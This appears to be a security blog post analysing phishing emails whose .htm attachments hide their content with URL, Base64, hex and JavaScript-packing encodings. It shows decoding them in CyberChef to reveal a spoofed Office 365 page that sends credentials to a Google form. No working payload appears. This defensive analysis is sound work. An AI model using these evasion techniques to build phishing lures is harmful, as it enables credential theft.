So the HexNinja has been spending a lot of time going Phishing. Well more correctly examining phishing emails and watching them evolve and do their best to avoid SPAM detection while also gaining your confidence.
One of the questions I get asked is how the Phishing email got into our mail system without being flagged as malicious.
Besides obvious issues of SPF DKIM DMARC or lack thereof I am finding many phishing emails containing htm attachments.
They always have a great title like Remittance #763.htm or Invoice #692.htm and if your job is to process payments and balance the books and the email has come from a known contact that is a customer or supplier then the motivation to open a htm attachment is high.
Examining the contents of many htm files they don't look like human readable htm formats. To obfuscate their contents they will rely on a one or a combination of encoding to hide their true intentions and also so fool your email protection systems.
So armed with CyberChef https://gchq.github.io/CyberChef/ we can begin experimenting with how the files are encoded.
The four main techniques I am seeing are:
- URL encoding
- Base64
- Hexidecimal encoding
- Javascript packing
URL ENCODING
Try pasting that string into your browser and it automatically resolves to www.thehexninja.com.
We can get Cyberchef to do the heavy lifting of url decoding. We can copy all the encoded block within the quotes and paste it into Cyberchef using the URL Decode function as shown below.
This would obviously render to a simple embedded link as shown below
So we can see how this simple technique can be used to evade basic mail scanners, especially if the embedded link is not malicious such as a OneDrive, DropBox, SharePoint or a page on a another website.
Base64 Encoding
Sometimes the htm attachment contains base64 encoded sections, typically images prefixed with the type of image images/png or images/jpg
We can copy these encoded sections and paste into cyberchef (From Base 64)
We can now paste the Hex output into a hexeditor and save it as a JPG (image/jpeg) or PNG (image/png).
The first PNG image decodes to
The second image is a JPG and renders as:
The forth image decodes to
When these images are overlayed they appear as
This is the classic spoofed Microsoft Office 365.
Hiding beneath the enticing image/webpage is the the code which basically accepts a post of the password and username in a POST to a google form, essentially capturing the victims credentials
Until next time, the hexninja says:
Stop Sneaky Phishers!
Encoding to Hide Data
Never Trust The Phish
No comments:
Post a Comment